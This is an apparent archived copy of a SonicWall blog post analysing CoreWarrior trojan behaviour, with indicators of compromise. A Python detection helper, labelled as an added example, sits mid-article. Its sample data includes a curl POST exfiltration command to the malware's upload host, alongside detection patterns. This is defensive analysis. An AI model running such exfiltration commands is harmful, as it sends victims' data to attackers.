URL: https://blog.sonicwall.com/en-us/2024/10/corewarrior-spreader-malware-surge/
Submission: On October 16 via api from DE — Scanned from DE
COREWARRIOR SPREADER MALWARE SURGE
By Security News, October 11, 2024

OVERVIEW
This week, the SonicWall Capture Labs threat research team investigated a sample of CoreWarrior malware. This is a persistent trojan that attempts to spread rapidly by creating dozens of copies of itself and reaching out to multiple IP addresses, opening multiple sockets for backdoor access, and hooking Windows UI elements for monitoring.

INFECTION CYCLE
The malware is a UPX-packed executable that has been manually tampered with and will not unpack using the standard UPX unpacker.

Figures 1 (top), 2 (bottom): Initial detection, and failure due to checksum error

At runtime, the executable creates a copy of itself with a randomly generated name. The copy launches a command prompt and uses curl to POST data to "http://wecan.hasthe(dot)technology/upload". Each time a POST completes, the parent program deletes the existing copy and creates a new one. During testing, one hundred and seventeen copies were created and deleted in under ten minutes.

Figure 3: Malware is connecting to site and posting data

While messages are being sent, the program binds a listener on ports 49730-49777 and 50334-50679. A secondary IP address of 172.67.183.40 received a single connection, but no TCP/UDP traffic was sent.

Figure 4: Multi-part output of data sent

The parent process obtains information on the system drives and creates a hook for the command prompt window to monitor for changes.
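As an added example (not SonicWall's code), the following Python triage helper checks host telemetry for the two behaviours the write-up reports: a process listening on ports in the 49730-49777 and 50334-50679 ranges, and a command line that uses curl to POST to the reported upload host. The netstat lines and command lines are constructed samples; the upload host is the defanged value from the post, refanged only for matching.

```python
"""Host-telemetry triage for the CoreWarrior behaviours reported in the
write-up (added example, not SonicWall's code). All sample data is constructed."""
import re

# Listener port ranges reported in the write-up (inclusive).
LISTENER_RANGES = ((49730, 49777), (50334, 50679))
# Upload host from the write-up, kept defanged here and refanged only for matching.
UPLOAD_HOST = "wecan.hasthe(dot)technology"

# Constructed sample of Windows `netstat -ano` output (TCP listeners only).
SAMPLE_NETSTAT = """\
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    0.0.0.0:49742          0.0.0.0:0              LISTENING       4412
  TCP    0.0.0.0:50400          0.0.0.0:0              LISTENING       4412
  TCP    0.0.0.0:50680          0.0.0.0:0              LISTENING       4412
  TCP    127.0.0.1:5432         0.0.0.0:0              LISTENING       2200
"""
# Constructed sample of (pid, command line) pairs as an EDR might record them.
SAMPLE_CMDLINES = [
    (5120, "cmd.exe /c curl -X POST -d @out.bin http://wecan.hasthe.technology/upload"),
    (2200, "postgres.exe -D C:\\data"),
]

NETSTAT_RE = re.compile(r"^\s*TCP\s+\S+:(\d+)\s+\S+\s+LISTENING\s+(\d+)\s*$", re.M)


def in_reported_range(port: int) -> bool:
    """True if the port falls in one of the listener ranges from the write-up."""
    return any(lo <= port <= hi for lo, hi in LISTENER_RANGES)


def suspicious_listeners(netstat_text: str) -> dict[int, list[int]]:
    """Map PID -> listening ports inside the reported ranges (50680 is just outside)."""
    hits: dict[int, list[int]] = {}
    for port, pid in NETSTAT_RE.findall(netstat_text):
        if in_reported_range(int(port)):
            hits.setdefault(int(pid), []).append(int(port))
    return hits


def posts_to_upload_host(cmdline: str) -> bool:
    """True if the command line runs curl with a POST/data option to the upload host."""
    host = UPLOAD_HOST.replace("(dot)", ".")
    return ("curl" in cmdline.lower() and host in cmdline
            and re.search(r"-X\s*POST|--data\b|\s-d\s", cmdline, re.I) is not None)


def triage(netstat_text: str, cmdlines: list[tuple[int, str]]) -> dict:
    """Report both indicators separately: the parent binds the listeners while a
    short-lived copy runs the curl POST, so the PIDs are expected to differ."""
    return {"listener_pids": suspicious_listeners(netstat_text),
            "upload_pids": sorted(pid for pid, cmd in cmdlines if posts_to_upload_host(cmd))}
```

Run `triage(SAMPLE_NETSTAT, SAMPLE_CMDLINES)` to see both indicator sets; on a real host, feed it the actual `netstat -ano` output and process command lines from your EDR.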
The malware has several anti-analysis capabilities, including:
* Anti-debug using rdtsc to check debug timings; the program exits if the times exceed a threshold
* Evasion using a randomized sleep timer that changes with the number of connection attempts/successes/failures (Figure 4)
* VM environment detection, as there are strings to check for Hyper-V containers

Figure 5: Variables used in sleep determinations

Other protocols referenced by the code include FTP, SMTP, and POP3 for data exfiltration.

SONICWALL PROTECTIONS
To ensure SonicWall customers are prepared for any exploitation that may occur due to this malware, the following signatures have been released:
* CoreWarrior.A

IOCS
85A6E921E4D5107D13C1EB8647B130A1D54BA2B6409118BE7945FD71C6C8235F (packed)
8C97329CF7E48BB1464AC5132B6A02488B5F0358752B71E3135D9D0E4501B48D (unpacked)

Security News
The SonicWall Capture Labs Threat Research Team gathers, analyzes and vets cross-vector threat information from the SonicWall Capture Threat network, consisting of global devices and resources, including more than 1 million security sensors in nearly 200 countries and territories. The research team identifies, analyzes, and mitigates critical vulnerabilities and malware daily through in-depth research, which drives protection for all SonicWall customers. In addition to safeguarding networks globally, the research team supports the larger threat intelligence community by releasing weekly deep technical analyses of the most critical threats to small businesses, providing critical knowledge that defenders need to protect their networks.